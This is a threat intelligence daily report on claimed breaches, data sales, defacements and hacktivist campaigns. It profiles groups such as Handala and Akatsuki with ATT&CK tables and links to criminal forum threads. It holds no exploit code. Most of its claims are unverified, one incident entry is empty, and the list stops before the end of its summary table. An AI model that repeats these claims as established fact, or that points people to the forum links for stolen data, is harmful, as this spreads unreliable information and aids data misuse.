[July-06-2025] Daily Cybersecurity Threat Report

Executive Summary

The past 24 hours have underscored a dynamic and multifaceted global cybersecurity landscape, characterized by a spectrum of threats ranging from financially motivated data breaches and malware sales to ideologically driven hacktivism and website defacements. A notable trend involves the direct manifestation of geopolitical conflicts within the cyber domain, where state-aligned actors and their proxies engage in digital warfare to achieve strategic objectives. This includes groups like Akatsuki Cyber Team and Handala, deeply embedded in the Israel-Iran and Israel-Palestine conflicts, respectively, showcasing how real-world tensions translate into targeted cyber operations.

Another significant observation is the dual nature of hacktivism. While some groups, such as KAL EGY 319, primarily engage in symbolic disruptions with minimal actual impact, others like Handala demonstrate an alarming evolution towards nation-state-level capabilities, executing highly destructive and data-intensive attacks. This distinction highlights the critical need for nuanced threat assessment, differentiating between propaganda-driven claims and genuinely impactful breaches. Furthermore, the persistent exploitation of unpatched vulnerabilities by financially motivated actors like Ghost (Cring) Ransomware continues to be a prevalent and effective attack vector, emphasizing fundamental weaknesses in organizational security posture. The reliance on legitimate tools by groups like Rare Werewolf also presents a challenge, as traditional defenses may struggle to differentiate between benign and malicious activity. Collectively, these incidents paint a picture of an increasingly complex threat environment demanding adaptive and intelligence-driven defensive strategies.

Daily Incident Briefs

This section provides a detailed analysis of cybersecurity incidents reported in the last 24 hours. For each incident, a summary of the breach, a comprehensive profile of the responsible threat actor, their observed Tactics, Techniques, and Procedures (TTPs), and the broader impact and context are provided. All available links, including published URLs and screenshots, are included for further reference.

Daily Incident Summary Table

Incident Name	Affected Sector/Entity	Primary Threat Actor	Brief Impact	Date Reported
AKATSUKI CYBER TEAM claims to target Israel	Israel	Akatsuki cyber team (official)	Alert: Group claims targeting Israel	2025-07-06T13:23:44Z
Alleged sale of VPN access to multiple Southeast Asian Academic and Medical Institutions	Academic Institutions across Southeast Asia	XManX	Initial Access: Sale of 7 Fortinet SSL VPN accesses	2025-07-06T12:03:09Z
Alleged sale of data from multiple companies	Multiple companies	nick_diesel	Data Leak: Sale of data from multiple companies	2025-07-06T09:51:31Z
Alleged data leak of Freedom Wood Doors Ltd	Freedom Wood Doors Ltd, Israel (Manufacturing)	Handala Hack	Data Leak: 92GB data leak including client lists, invoices, schematics	2025-07-06T09:42:26Z
KAL EGY 319 claims to target the Turkish government	Turkey (Government Administration)	KAL EGY 319	Alert: Group claims targeting Turkish government	2025-07-06T08:20:01Z
Alleged leak of webshell access to Kerala State Coir Corporation Ltd	Kerala State Coir Corporation Ltd, India (Manufacturing)	WOLF CYBER ARMY	Initial Access: Unauthorized access to corporate systems	2025-07-06T07:05:48Z
WOLF CYBER ARMY targets the website of mtsmaarif03.com	mtsmaarif03.com	WOLF CYBER ARMY	Defacement: Website defacement	2025-07-06T06:11:07Z
Liwaa Muhammad targets the website of Tamam Company	Tamam Company, Saudi Arabia (Facilities Services)	Liwaa Muhammad	Defacement: Website defacement	2025-07-06T05:33:37Z
Alleged data breach of Advanced Call Center Technologies, LLC	Advanced Call Center Technologies, LLC, USA (Outsourcing & Offshoring)	DigitalGhost	Data Breach: Leak of sensitive user information	2025-07-06T04:24:35Z
Alleged data breach of Advanced Call Center Technologies, LLC	Advanced Call Center Technologies, LLC, USA (Government & Public Sector)	DigitalGhost	Data Breach: Leak of sensitive user information	2025-07-06T04:18:11Z
Alleged data breach of Go Bus	Go Bus, Egypt (Transportation & Logistics)	stepbro	Data Breach: 1.4 million customer records leaked	2025-07-06T04:10:18Z
Alleged Data Leak of Taxi Company Egypt	Egypt (Transportation & Logistics)	stepbro	Data Leak: 176,000 user records leaked	2025-07-06T04:07:56Z
Alleged data breach of Mazaya Egypt	Mazaya Egypt, Egypt (Retail Industry)	stepbro	Data Breach: Breach of customer data (name, address, payment)	2025-07-06T04:01:05Z
Liwaa Muhammad targets the website of Arkan Al Omran Factory	Arkan Al Omran Factory, Saudi Arabia (Manufacturing)	Liwaa Muhammad	Defacement: Website defacement	2025-07-06T03:37:17Z
Liwaa Muhammad targets the website of Multi Technical Solutions Establishment	Multi Technical Solutions Establishment, Saudi Arabia (Sports)	Liwaa Muhammad	Defacement: Website defacement	2025-07-06T03:37:12Z
Alleged data leak of Philippine fresh user records	Philippines	NotFoundddd	Data Leak: Over 500,000 user records leaked	2025-07-06T02:51:59Z
Alleged data breach of SOM ENERGIA	Som Energia, Spain (Renewables & Environment)	Nosferatu	Data Breach: 120,000 records leaked (personal, banking)	2025-07-06T02:42:27Z
Alleged leak of Vehicle Plates Database Chile	Chile	DelitosPenales	Data Leak: Over 55,000 vehicle registration records leaked	2025-07-06T02:41:48Z
Alleged sale of CAIN Malware	N/A	BUBBAS GATE	Malware: Sale of malicious cryptocurrency wallet clone	2025-07-06T02:16:23Z
Alleged data sale of documents from a Federal State Budgetary Institution of Higher Education	Russia (Higher Education/Acadamia)	deabec	Data Leak: Sale of classified documents (Gazprom, tax, legal)	2025-07-06T01:45:35Z
Alleged data breach of Fashion Group México and GOC Makeup	Fashion Group México, Mexico (Healthcare & Pharmaceuticals)	Rui_Deidad	Data Breach: 135,535 records leaked (personal, financial)	2025-07-06T00:43:03Z
Alleged leak of data from a Seychelle main bank	Seychelles (Banking & Mortgage)	ByteToBreach	Data Leak: Client information leaked from major bank	2025-07-06T00:30:25Z
Alleged data sale from an unidentified financial services firm in panama	Panama (Financial Services)	Lucczi	Data Leak: 60,000 financial service entries leaked	2025-07-06T00:01:23Z

Incident 1: AKATSUKI CYBER TEAM claims to target Israel

Summary of Breach and Affected Entities:

A recent post by the group claims that they are targeting Israel.

Detailed Threat Actor Profile: Akatsuki Cyber Team

Identity and Affiliation: Akatsuki Cyber Team is recognized as a pro-Iran hacktivist group. This group is increasingly prominent within the ongoing Israel-Iran cyber conflict, particularly as many Iran-based groups may experience reduced activity due to internet blackouts. Akatsuki Cyber Team is observed to be coordinating efforts and directing its focus towards Israeli targets.¹ Their operations are part of a broader “cyber war” that involves both official Iranian cyber units and various proxy groups.¹

Motivations: The primary drivers behind Akatsuki Cyber Team’s operations are geopolitical and ideological, aligning directly with Iran’s strategic interests within the cyber domain. Their activities are designed to contribute to shaping public perception and exerting pressure during periods of geopolitical escalation.¹

Tactics, Techniques, and Procedures (TTPs):

Tactic	Technique	Description/Examples	Associated Malware/Tools	MITRE ATT&CK ID
Initial Access	Exploit Public-Facing Application	Exploitation of unpatched or outdated software with known Common Vulnerabilities and Exposures (CVEs).²	N/A	T1190
Initial Access	Valid Accounts	Exploitation of default or common passwords on internet-connected accounts and devices; automated password guessing; password hash cracking.²	N/A	T1078
Reconnaissance	Active Scanning	Utilization of tools like Shodan to identify vulnerable internet-facing devices, particularly within Industrial Control System (ICS) environments.²	Shodan	T1595.002
Lateral Movement	Internal Spearphishing	Exploiting weak segmentation or misconfigured firewalls to move across networks after initial compromise.²	N/A	T1534
Execution & Persistence	Remote Access Tools (RATs)	Deployment of RATs for remote control and access.²	Various RATs	T1219
Execution & Persistence	Credential Dumping	Use of keyloggers and legitimate administrative utilities to escalate access and evade endpoint defenses.²	Keyloggers, Mimikatz	T1003
Execution & Persistence	Command and Scripting Interpreter	Use of legitimate administrative utilities like PsExec.²	PsExec	T1059
Impact	Data Destruction	Potential future use of wiper malware to destroy data.¹	Wiper malware	T1485
Impact	Data Encrypted for Impact	Potential future use of ransomware for financial support.¹	Ransomware	T1486
Impact	Denial of Service	Execution of Distributed Denial of Service (DDoS) attacks.¹	N/A	T1498
Impact	Data Theft	Campaigns focused on stealing data.¹	N/A	T1041
Impact	Disruptive Attacks	Intrusion attempts on critical infrastructure, potential exploitation of PLCs, SCADAs, and other OT systems.¹	N/A	T1499, T1529
Command and Control	Ingress Tool Transfer	Employing system engineering and diagnostic tools to breach Operational Technology (OT) networks.²	N/A	T1105
Collection	Data from Local System	Siphoning credentials and other sensitive information.²	N/A	T1005

Impact and Broader Context:

The activities of Akatsuki Cyber Team are a direct reflection of the “cyber reflections” of the Israel-Iran conflict, indicating a likelihood of faster and more intense digital confrontations.1 Their visible and early involvement in these escalations suggests that state-linked cyber units are increasingly instrumental in shaping both public perception and strategic pressure, blurring the traditional boundaries between conventional and cyber warfare.1 The consistent pattern of state-sponsored entities and their aligned hacktivist proxies engaging in cyber actions demonstrates a direct and escalating manifestation of real-world geopolitical conflicts within the cyber domain. This means that organizations with ties to regions experiencing geopolitical tensions must maintain heightened vigilance against ideologically motivated attacks, which may prioritize disruption, psychological warfare, or intelligence gathering over purely financial objectives.

Relevant Resources:

Published URL: https://t.me/c/2601166559/102

Screenshots: https://d34iuop8pidsy8.cloudfront.net/d479d4c2-89e9-48ab-aa6b-d1dd8e00996f.PNG, https://d34iuop8pidsy8.cloudfront.net/25e692d9-0ea5-4c48-bcd2-0abd4c4ac604.PNG

Incident 2: Alleged sale of VPN access to multiple Southeast Asian Academic and Medical Institutions

Summary of Breach and Affected Entities:

The threat actor claims to be selling unauthorized access to 7 Fortinet SSL VPNs allegedly linked to legitimate.edu and.ac domain networks. The compromised VPN credentials reportedly grant access to internal systems of university and academic institutions across Southeast Asia, including Malaysia, Thailand, Taiwan, Kenya, Pakistan, and India.

Detailed Threat Actor Profile: XManX

Identity and Affiliation: XManX is identified as a threat actor operating in online criminal forums, potentially involved in the sale of access to compromised systems.³ Specific details regarding their history or broader affiliations are limited in the provided research material.

Motivations: As with many actors on cybercrime forums, the primary motivation for XManX appears to be financial gain through the sale of illicit access.³

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for XManX are not detailed in the provided research. However, general methods for gaining initial access to systems for sale often include exploiting public-facing applications with known vulnerabilities (CVEs) or using default/common passwords.2

Impact and Broader Context:

The sale of VPN access poses a significant risk as it can lead to further exploitation, including data theft, ransomware deployment, or other disruptive activities within the compromised networks. The targeting of academic and medical institutions highlights the vulnerability of these sectors to financially motivated cybercrime.

Relevant Resources:

Published URL: https://darkforums.st/Thread-Selling-7-Fortinet-SSL-VPN-Access-%E2%80%93-edu-ac-Domains

Screenshots: https://d34iuop8pidsy8.cloudfront.net/5e441023-87e8-41b2-b9ee-717b77100da6.png

Incident 3: Alleged sale of data from multiple companies

Summary of Breach and Affected Entities:

The threat actor claims to be selling data from multiple companies.

Detailed Threat Actor Profile: nick_diesel

Identity and Affiliation: nick_diesel is identified as a threat actor active on online forums, potentially involved in the sale of stolen data.⁵ Specific details regarding their history or broader affiliations are limited in the provided research material.⁶

Motivations: The primary motivation for nick_diesel appears to be financial gain through the sale of exfiltrated data.

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for nick_diesel are not detailed in the provided research. Data leaks typically result from various methods, including exploiting vulnerabilities, phishing, or insider threats.7

Impact and Broader Context:

The sale of data from multiple companies indicates a broad targeting strategy, potentially impacting various industries and exposing sensitive information. Such data can be used for further cybercrime, including identity theft, fraud, or targeted phishing campaigns.

Relevant Resources:

Published URL: https://forum.exploit.in/topic/261980/?tab=comments#comment-1579683

Screenshots: https://d34iuop8pidsy8.cloudfront.net/5bafa785-f578-4086-8cf5-2b0c36c553ee.png

Incident 4: Alleged data leak of Freedom Wood Doors Ltd

Summary of Breach and Affected Entities:

A threat actor claims to have leaked 92GB of data from Freedom Wood Doors Ltd, Israel. The breach reportedly includes client lists, invoices, delivery schedules, technical schematics, and PoC.

Detailed Threat Actor Profile: Handala Hack Group

Identity and Affiliation: Handala is a pro-Palestinian hacktivist group that has demonstrated significant activity targeting Israeli organizations and digital infrastructure since late 2023.⁸ While the group asserts independent activism, many cybersecurity experts suggest that Iranian state interests may play a supporting role, indicating a potential proxy relationship.⁸

Motivations: The group is ideologically driven by pro-Palestinian motives, focusing its attacks on Israeli government, infrastructure, and private organizations.⁸ Handala’s operational strategy integrates technical capabilities with psychological warfare, leveraging mass communications to amplify fear and confusion among victims and the broader public.⁸

Tactics, Techniques, and Procedures (TTPs):

Tactic	Technique	Description/Examples	Associated Malware/Tools	MITRE ATT&CK ID
Initial Access	Phishing	Phishing campaigns, often exploiting major events and critical vulnerabilities, masquerading as legitimate organizations to gain initial access. Evolution from basic phishing to credential-based infiltrations.⁹	N/A	T1566
Execution & Persistence	Multi-Stage Loading	Utilization of a multi-stage loading process for malware delivery, including a Delphi-coded second-stage loader and an AutoIT injector.⁹	Delphi, AutoIT injector	T1059
Execution & Persistence	Privilege Escalation	Focus on privilege escalation and establishing long-term persistence within victim environments.⁸	N/A	T1068
Defense Evasion	Obfuscated Files or Information	Malware designed to blend into normal network traffic to evade detection.⁸	N/A	T1027
Impact	Data Destruction	Use of custom wiper malware specifically targeting Windows and Linux environments for destructive attacks.⁹	win.handala, win.hatef, win.flash_develop	T1485
Impact	Data Theft	Engagement in data theft and extortion.⁹	N/A	T1041
Impact	Denial of Service	Execution of Distributed Denial of Service (DDoS) attacks.⁸	N/A	T1498
Exfiltration	Exfiltration Over C2 Channel	Use of cloud storage (e.g., AWS S3, Storj) and multi-channel Command and Control (C2) techniques, including Telegram, for data exfiltration.⁸	AWS S3, Storj, Telegram, senvarservice-DC.exe	T1041, T1567.002
Impact	Public Disclosure	Operation of a data leak site to publicize stolen data, although claims of success are sometimes disputed.⁹	Data leak site	T1598
Impact	Psychological Operations	Triggering emergency sirens and sending mass SMS alerts to cause panic (e.g., kindergarten alert hijack).⁸	N/A	T1589
Communication	Social Media	Heavy use of Telegram and social media to publicize operations and taunt victims.⁸	Telegram, social media	T1589

Impact and Broader Context:

Handala’s evolution from a disruptive hacktivist collective to an actor demonstrating “nation-state-level capabilities” highlights the increasing sophistication of ideologically motivated groups, especially when they receive potential backing from state interests.8 The documented disruption of their activities through proactive threat intelligence, exemplified by OP Innovate’s “Unpacking Handala” report, underscores the critical importance of detailed technical analysis in empowering defenders and disrupting threat actor momentum.8 This demonstrates that comprehensive intelligence gathering and dissemination can significantly enhance overall cyber resilience by providing organizations with early-warning capabilities and actionable Indicators of Compromise (IOCs).8

Relevant Resources:

Published URL: https://t.me/handala_hack27/81

Screenshots: https://d34iuop8pidsy8.cloudfront.net/493cff5b-f38d-49af-a286-8622d8616d96.png

Incident 5: KAL EGY 319 claims to target the Turkish government

Summary of Breach and Affected Entities:

A recent post by the group claims that they are targeting the Turkish government.

Detailed Threat Actor Profile: KAL EGY 319

Identity and Affiliation: KAL EGY 319 is identified as a Pakistan-linked hacktivist group. This group operates within a broader surge of hacktivist activity related to the India-Pakistan conflict, often alongside other groups such as Nation Of Saviors and SYLHET GANG-SG.¹⁰

Motivations: The group is ideologically driven by the India-Pakistan conflict, claiming responsibility for attacks on Indian government, educational institutions, and critical infrastructure websites.¹⁰

Tactics, Techniques, and Procedures (TTPs):

Tactic	Technique	Description/Examples	Claimed Impact	Actual Verified Impact
Initial Access	Phishing	Phishing emails with malicious attachments, such as PowerPoint files containing macros.¹⁰	N/A	N/A
Execution	Malicious File	Delivery of Crimson RAT malware cleverly disguised as an image file (e.g., WEISTT.jpg), which then launches an executable (jnmxrvt hcsm.exe) to initiate infection.¹⁰	N/A	N/A
Impact	Defacement	Claimed widespread defacement campaign affecting approximately 40 Indian educational and medical websites.¹⁰	Approximately 40 Indian educational and medical websites defaced.¹⁰	All named websites were found to be functioning normally; defacements were either not fully executed or did not result in significant compromise.¹⁰
Impact	Data Breach	Claims of over 100 successful breaches of government sites and critical infrastructure, including the CBI, Election Commission of India (ECI), and National Portal of India. Alleged exfiltration of 247 GB of sensitive government data from India’s National Informatics Centre.¹⁰	Over 100 breaches, 247 GB of sensitive government data exfiltrated.¹⁰	Alleged data leaks were largely unsubstantiated, consisting of publicly available marketing materials or recycled data. The “proof” for the 247 GB claim amounted to just 1.5 GB of public media files.¹⁰
Impact	Data Breach	Alleged data stolen from the Andhra Pradesh High Court.¹¹	Data stolen from Andhra Pradesh High Court.¹¹	Consisted mostly of case metadata already available online.¹¹

Impact and Broader Context:

The activities of KAL EGY 319 exemplify the “tactical reality behind the India-Pakistan hacktivist surge,” where claimed disruptions are often symbolic rather than deeply impactful.10 This highlights a common characteristic of some hacktivist operations: high visibility and bold claims that serve as propaganda, but with limited technical sophistication or lasting damage. This contrasts sharply with more advanced state-sponsored groups, such as APT36, which has been observed using sophisticated phishing campaigns to infiltrate Indian government and defense networks.11 Understanding this distinction is crucial for accurate threat assessment, preventing the misallocation of resources to symbolic attacks, and ensuring focus remains on threats with verified, tangible impact.

Relevant Resources:

Published URL: https://t.me/c/2678006578/8

Screenshots: https://d34iuop8pidsy8.cloudfront.net/65969aa7-698f-4266-91ec-d9efe48773fd.png

Incident 6: Alleged leak of webshell access to Kerala State Coir Corporation Ltd

Summary of Breach and Affected Entities:

The group claims to have gained unauthorised access to the Kerala State Coir Corporation Ltd.

Detailed Threat Actor Profile: WOLF CYBER ARMY

Identity and Affiliation: WOLF CYBER ARMY is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.¹² Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: While specific motivations for WOLF CYBER ARMY are not detailed, threat actors can be driven by various factors including financial gain, ideological beliefs (hacktivism), or state-sponsored objectives.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for WOLF CYBER ARMY are not detailed in the provided research. However, initial access, such as gaining webshell access, often involves exploiting public-facing applications, phishing, or leveraging compromised credentials.2

Impact and Broader Context:

Unauthorized access, such as webshell access, is a critical initial step for attackers, allowing them to maintain persistence, escalate privileges, and potentially exfiltrate data or deploy further malicious payloads. This incident highlights the importance of securing web applications and monitoring for unauthorized access attempts.

Relevant Resources:

Published URL: https://t.me/c/2678983526/581

Screenshots: https://d34iuop8pidsy8.cloudfront.net/fcecbd86-919f-4274-b75b-6bd211f5ca41.png

Incident 7: WOLF CYBER ARMY targets the website of mtsmaarif03.com

Summary of Breach and Affected Entities:

The group claims to have defaced the website of mtsmaarif03.com. Mirror Link: https://defacer.id/mirror/id/170069

Detailed Threat Actor Profile: WOLF CYBER ARMY

Motivations: While specific motivations for WOLF CYBER ARMY are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.¹⁴

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for WOLF CYBER ARMY are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website.7

Impact and Broader Context:

Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.

Relevant Resources:

Published URL: https://t.me/c/2678983526/579

Screenshots: https://d34iuop8pidsy8.cloudfront.net/16545dde-299b-4cc7-8945-e9deb77172f9.jpg

Incident 8: Liwaa Muhammad targets the website of Tamam Company

Summary of Breach and Affected Entities:

The group claims to have defaced the website of Tamam Company.

Detailed Threat Actor Profile: Liwaa Muhammad

Identity and Affiliation: Liwaa Muhammad is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.¹⁵ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.¹⁴

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for Liwaa Muhammad are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website.7

Impact and Broader Context:

Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.

Relevant Resources:

Published URL: https://t.me/liwaamohammad/477

Screenshots: https://d34iuop8pidsy8.cloudfront.net/f346a44b-5e5a-4514-b223-18bf8e3ee252.jpg

Incident 9: Alleged data breach of Advanced Call Center Technologies, LLC

Summary of Breach and Affected Entities:

The threat actor claims to have leaked a database of Advanced Call Center Technologies containing sensitive user information, including user IDs, phone numbers, email addresses, and timestamps of activity.

Detailed Threat Actor Profile: DigitalGhost

Identity and Affiliation: DigitalGhost is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.²⁰ The research notes explicitly state that information about “Ghost (Cring) Ransomware” refers to a different group and not “DigitalGhost”.²¹ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: While specific motivations for DigitalGhost are not detailed, data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for DigitalGhost are not detailed in the provided research. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

A data breach involving sensitive user information can lead to significant financial and reputational damage for the victim organization. Compromised data can be used for identity theft, phishing, and other fraudulent activities, impacting a large number of individuals.

Relevant Resources:

Published URL: https://darkforums.st/Thread-68K-ADVANCED-CALL-CANTER-TECHNOLOGIES-DATA

Screenshots: https://d34iuop8pidsy8.cloudfront.net/86ae01ed-8987-4067-9631-24fa423c30a1.png, https://d34iuop8pidsy8.cloudfront.net/512ce153-a65f-499e-ac38-2ea0130086be.png

Incident 10: Alleged data breach of Advanced Call Center Technologies, LLC

Summary of Breach and Affected Entities:

Detailed Threat Actor Profile: DigitalGhost

Tactics, Techniques, and Procedures (TTPs):

Impact and Broader Context:

Relevant Resources:

Published URL: https://darkforums.st/Thread-68K-ADVANCED-CALL-CANTER-TECHNOLOGIES-DATA

Screenshots: https://d34iuop8pidsy8.cloudfront.net/86ae01ed-8987-4067-9631-24fa423c30a1.png, https://d34iuop8pidsy8.cloudfront.net/512ce153-a65f-499e-ac38-2ea0130086be.png

Incident 11: Alleged data breach of Go Bus

Summary of Breach and Affected Entities:

The threat actor claims to have leaked the database of GoBus Egypt, compromising data from 1.4 million customers. The exposed information includes names, email addresses, phone numbers, and password hashes.

Detailed Threat Actor Profile: stepbro

Identity and Affiliation: stepbro is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.²² Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for stepbro are not detailed in the provided research.24 Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

A data breach of this scale, affecting 1.4 million customers and including sensitive information like password hashes, poses a severe risk of identity theft, account compromise, and further targeted attacks. This highlights the critical need for strong data security measures and robust password policies.

Relevant Resources:

Published URL: https://xss.is/threads/141331/

Screenshots: https://d34iuop8pidsy8.cloudfront.net/adeb0ffd-2a83-40be-bf59-949d09e84b2b.png, https://d34iuop8pidsy8.cloudfront.net/dd22c7c3-3760-4d2d-9b76-2cfc36bcc3ab.png

Incident 12: Alleged Data Leak of Taxi Company Egypt

Summary of Breach and Affected Entities:

The threat actor claims to have leaked data of 176,000 users from an Egyptian taxi company, exposing names, phone numbers, emails, and other personal details.

Detailed Threat Actor Profile: stepbro

Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for stepbro are not detailed in the provided research.24 Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

The leak of personal details for 176,000 users can lead to various forms of abuse, including targeted phishing, spam, and potential identity theft. This underscores the importance of robust data protection for service providers handling customer information.

Relevant Resources:

Published URL: https://xss.is/threads/141330/

Screenshots: https://d34iuop8pidsy8.cloudfront.net/d7b105b8-ccd7-447e-b71e-88237a4f4162.jpg

Incident 13: Alleged data breach of Mazaya Egypt

Summary of Breach and Affected Entities:

The threat actor claims to have breached the data of Mazaya perfumes store Egypt. The compromised data consists of name, address, payment, etc.

Detailed Threat Actor Profile: stepbro

Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Impact and Broader Context:

The breach of customer data, including payment information, from a retail store highlights the risks associated with e-commerce platforms. Such incidents can lead to financial fraud and erode customer trust, emphasizing the need for strong payment card industry (PCI) compliance and data encryption.

Relevant Resources:

Published URL: https://xss.is/threads/141332/

Screenshots: https://d34iuop8pidsy8.cloudfront.net/67e9b363-20b4-48be-be2e-04910c0a4350.png

Incident 14: Liwaa Muhammad targets the website of Arkan Al Omran Factory

Summary of Breach and Affected Entities:

The group claims to defaced the website of Arkan Al Omran Factory.

Detailed Threat Actor Profile: Liwaa Muhammad

Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.¹⁴

Tactics, Techniques, and Procedures (TTPs):

Impact and Broader Context:

Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.

Relevant Resources:

Published URL: https://t.me/liwaamohammad/476

Screenshots: https://d34iuop8pidsy8.cloudfront.net/8b15ebea-0982-4764-8381-75ce8e42dc01.png

Incident 15: Liwaa Muhammad targets the website of Multi Technical Solutions Establishment

Summary of Breach and Affected Entities:

The group claims to have defaced the website of Multi Technical Solutions Establishment.

Detailed Threat Actor Profile: Liwaa Muhammad

Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.¹⁴

Tactics, Techniques, and Procedures (TTPs):

Impact and Broader Context:

Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.

Relevant Resources:

Published URL: https://t.me/liwaamohammad/474

Screenshots: https://d34iuop8pidsy8.cloudfront.net/5c40a434-0a32-4409-ac00-7b29200967c3.jpg

Incident 16: Alleged data leak of Philippine fresh user records

Summary of Breach and Affected Entities:

The threat actor claims to have leaked a database containing over 500,000 fresh Philippine user records, including emails, phone numbers, usernames, and physical addresses.

Detailed Threat Actor Profile: NotFoundddd

Identity and Affiliation: NotFoundddd is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.²⁷ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for NotFoundddd are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

The leak of over 500,000 user records, including personal identifiable information (PII), poses a significant risk for the affected individuals, potentially leading to identity theft, targeted phishing, and other forms of fraud. This highlights the importance of robust data security practices for any entity handling large volumes of user data.

Relevant Resources:

Published URL: https://darkforums.st/Thread-Selling-over-500K-fresh-Philippine-fresh-user-records-for-sale

Screenshots: https://d34iuop8pidsy8.cloudfront.net/88b77c9e-5af1-4490-9b0f-e9062f63a702.png

Incident 17: Alleged data breach of SOM ENERGIA

Summary of Breach and Affected Entities:

The threat actor claims to have leaked a database of 120,000 records from Som Energia, a Spanish renewable energy cooperative. The leak includes personal and banking information such as names, contact details, national IDs, addresses, and IBANs.

Detailed Threat Actor Profile: Nosferatu

Identity and Affiliation: Nosferatu is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.²⁹ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: The primary motivation for Nosferatu appears to be financial gain, as indicated by their involvement in campaigns to generate revenue from FakeAV (Fake Antivirus) redirects.²⁹

Tactics, Techniques, and Procedures (TTPs):

Nosferatu has been observed leveraging compromised websites, particularly those tied to WebFusion, in SEO campaigns to redirect victims to FakeAV malware.29 This involves dropping SEO bot scripts (e.g.,

lndex.php) that generate spam pages and contact a C&C server to obtain redirection information.²⁹

Impact and Broader Context:

The data breach of a renewable energy cooperative, involving personal and banking information, highlights the vulnerability of critical infrastructure-related organizations to financially motivated attacks. Such breaches can lead to direct financial fraud and broader trust issues within the energy sector. The use of SEO poisoning and FakeAV redirects by actors like Nosferatu demonstrates a common tactic to monetize compromised systems by tricking users into installing malicious software.

Relevant Resources:

Published URL: https://darkforums.st/Thread-Selling-Som-Energia-Database-SPAIN

Screenshots: https://d34iuop8pidsy8.cloudfront.net/f229d86e-1784-426c-8fa6-1d7fa2eeb0ca.png, https://d34iuop8pidsy8.cloudfront.net/d95f6642-57d6-4eff-8f53-ef581c6c76d9.png

Incident 18: Alleged leak of Vehicle Plates Database Chile

Summary of Breach and Affected Entities:

The threat actor claims to have leaked a database containing detailed vehicle registration records from Chile on a cybercrime forum. The dataset, dated July 5, 2025, reportedly includes over 55,000 records and continues to grow. It contains information such as license plates, vehicle specifications, owner names and identification numbers, inspection details, and traffic ticket counts.

Detailed Threat Actor Profile: DelitosPenales

Identity and Affiliation: DelitosPenales is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.⁷ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for DelitosPenales are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

The leak of a national vehicle registration database is a significant privacy concern, potentially enabling various forms of fraud, surveillance, or targeted criminal activities. This highlights the critical importance of securing government and public sector databases that contain extensive personal and sensitive information.

Relevant Resources:

Published URL: https://darkforums.st/Thread-Plates-Chile-Database

